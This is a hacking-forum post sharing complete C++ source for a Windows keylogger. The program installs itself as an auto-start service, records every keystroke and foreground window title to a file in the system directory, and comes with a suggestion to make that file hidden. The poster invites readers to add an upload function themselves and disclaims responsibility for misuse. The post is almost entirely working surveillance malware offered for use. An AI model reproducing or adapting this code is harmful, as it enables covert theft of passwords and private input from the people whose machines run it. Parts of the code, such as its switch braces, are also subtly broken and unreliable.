http://www.rohitab.com/discuss/topic/31185-c-windows-service-keylogger/
Here is a simple keylogger I put together, I decided to post it because I thought it was a pretty good example of creating a windows service. At one point the actual service was a dll injector that injected explorer with a dll that then did the logging on DLL_PROCESS_ATTACH. However, I scrapped that because I was having issues with the restrictions associate with dllmain. I didn't put an upload function or anything, but if you want to actually use it you can just do that yourself.
Oh yeah and any dumb/skiddy shit you may do with this is not my fault.
Eh, enjoy.
/* This is my new keylogger, runs as a Service */
#include <windows.h>
using namespace std;
BOOL Install_Logger_Service();
void Initialize_Service();
void WINAPI Create_Service(DWORD , CHAR**);
void WINAPI Handle_Controls(DWORD control_code);
BOOL Logger();
char service_name[100] = TEXT("Local Sex Daemon");
SERVICE_STATUS serv_status;
SERVICE_STATUS_HANDLE serv_handle = 0;
HANDLE stop_service = 0;
HHOOK hook_handle;
int main() {
Install_Logger_Service();
Initialize_Service();
return 0;
}
BOOL Install_Logger_Service() {
SC_HANDLE check_serv_handle = OpenSCManager(0, 0, SC_MANAGER_CONNECT);
if (check_serv_handle) {
SC_HANDLE chk_serv = OpenService(check_serv_handle, service_name, SERVICE_QUERY_STATUS);
if (chk_serv != NULL) {
CloseServiceHandle(chk_serv);
CloseServiceHandle(check_serv_handle);
return TRUE;
}
CloseServiceHandle(check_serv_handle);
}
SC_HANDLE serv_c_handle = OpenSCManager(0, 0, SC_MANAGER_CREATE_SERVICE);
if (serv_c_handle) {
char prog_path[MAX_PATH + 1];
if (GetModuleFileName(0, prog_path, sizeof(prog_path)/sizeof(prog_path[0])) == strlen(prog_path)) {
SC_HANDLE create_serv = CreateService (serv_c_handle,
service_name, //Service Name
service_name, //Display Name
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
prog_path,
0, 0, 0, 0, 0);
if (create_serv != NULL) {
StartService(create_serv, 0, 0); //This will get it started the first time
CloseServiceHandle(create_serv);
exit(0);
}
}
CloseServiceHandle(serv_c_handle);
}
return TRUE;
}
void WINAPI Create_Service(DWORD , CHAR**) {
serv_status.dwServiceType = SERVICE_WIN32;
serv_status.dwCurrentState = SERVICE_STOPPED;
serv_status.dwControlsAccepted = 0;
serv_status.dwWin32ExitCode = NO_ERROR;
serv_status.dwServiceSpecificExitCode = NO_ERROR;
serv_status.dwCheckPoint = 0;
serv_status.dwWaitHint = 0;
serv_handle = RegisterServiceCtrlHandler(service_name, Handle_Controls);
if (serv_handle) {
serv_status.dwCurrentState = SERVICE_START_PENDING;
SetServiceStatus(serv_handle, &serv_status);
stop_service = CreateEvent(0, FALSE, FALSE, 0);
serv_status.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus(serv_handle, &serv_status);
//This is where the logging gets started at
Logger();
}
return;
}
void WINAPI Handle_Controls(DWORD control_code) {
switch (control_code) {
default: {
break;
}
}
SetServiceStatus(serv_handle, &serv_status);
return;
}
void Initialize_Service() {
SERVICE_TABLE_ENTRY ServTable[] = {
{service_name, Create_Service},
{0, 0},
};
if (StartServiceCtrlDispatcher(ServTable) == 0) {
return;
}
return;
}
BOOL Logger() {
char window_text[500];
char old_window_text[500];
char latest_key[50];
char file_name[MAX_PATH + 1];
char write_name[500];
int i;
int virt_key;
HANDLE file_handle;
HWND fore_hndl;
DWORD numb_bytes;
GetSystemDirectory(file_name, MAX_PATH + 1);
strcat(file_name, "\\MahLogSon.txt");
file_handle = CreateFile (file_name, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL, 0); // Could make it hidden or
//something if you wanted
//FILE_ATTRIBUTE_HIDDEN
while (1) {
fore_hndl = GetForegroundWindow();
if (fore_hndl != NULL) {
if (GetWindowText(fore_hndl, (char*)&window_text, 499) != 0) {
if (strcmp(window_text, old_window_text) != 0) {
strcpy(write_name, "\r\n{WINDOW TITLE}-> ");
strcat(write_name, window_text);
strcat(write_name, "\r\n");
WriteFile(file_handle, write_name, strlen(write_name), &numb_bytes, NULL);
strcpy(old_window_text, window_text);
}
}
}
for (i = 8; i <= 255; i++) {
if ((GetAsyncKeyState(i) & 1) == 1) {
virt_key = MapVirtualKey(i, 0);
switch (i) {
case VK_RETURN: {
strcpy(latest_key, "\n");
break;
}
case VK_SPACE: {
strcpy(latest_key, " ");
break;
}
case VK_TAB: {
strcpy(latest_key, " ");
break;
}
case VK_DELETE: {
strcpy(latest_key, "[D]");
break;
}
case VK_BACK: {
strcpy(latest_key, "[B]");
break;
}
case VK_ESCAPE: {
strcpy(latest_key, "[EX]");
break;
}
case 0x0A2: {
}
case 0x00A3: { //This takes care of control keys
}
case 0x011: {
strcpy(latest_key, "[CTL]");
break;
}
case VK_SHIFT: {
}
case VK_LSHIFT: { // Shift Keys
}
case VK_RSHIFT: {
strcpy(latest_key, "[SFT]");
break;
default: {
GetKeyNameText(virt_key << 16, latest_key, 50);
break;
}
}
WriteFile(file_handle, latest_key, strlen(latest_key), &numb_bytes, NULL);
strcpy(latest_key, "");
}
}
Sleep(100);
}
CloseHandle(file_handle);
return TRUE;
}